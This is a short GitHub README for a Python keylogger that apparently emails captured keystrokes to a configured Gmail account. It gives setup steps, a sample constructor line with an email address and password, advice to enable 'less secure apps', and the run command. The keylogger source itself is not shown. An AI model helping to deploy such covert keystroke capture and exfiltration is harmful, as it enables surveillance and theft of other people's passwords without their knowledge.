Skip to content

Latest commit

 

History

History
15 lines (11 loc) · 726 Bytes

README.md

File metadata and controls

15 lines (11 loc) · 726 Bytes

Keylogger

  • This local keylogger will come in handy while neighbor's annoying child is playing with your computer.

  • In order to run it locally, you have to make slight changes.

  • Just edit the "run_keylogger.py" file as shown below

    • my_keylogger = keylogger.Keylogger(enter time interval, "email address", "password")

    • ex. my_keylogger = keylogger.Keylogger(120, "[email protected]", "123qwe")

  • I recommend creating a throwaway Gmail account for this purpose. It's because you’ll have to adjust your Gmail account’s security settings to allow access from your Python code. Allow less secure apps to ON.

Run the program

python3 run_keylogger.py